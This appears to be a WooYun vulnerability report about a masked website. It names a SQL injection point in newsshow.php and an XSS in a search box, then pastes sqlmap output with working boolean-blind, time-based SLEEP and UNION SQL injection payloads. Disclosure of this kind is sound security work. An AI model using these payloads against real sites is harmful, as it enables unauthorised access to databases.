WooYun.org

注入点：http://**.**.**.**/newsshow.php?id=2255
XSS:http://**.**.**.**/index.php 搜索框
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2255 AND 1133=1133
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=2255 AND (SELECT * FROM (SELECT(SLEEP(5)))lfEc)
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: id=-8395 UNION ALL SELECT NULL,NULL,CONCAT(0x71766a6271,0x6d4f6b51577
65753686c6c726d6767724f45524e6e434d7243444d4d47654e524d625a476d536759,0x7176716b71
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[10:58:37] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.12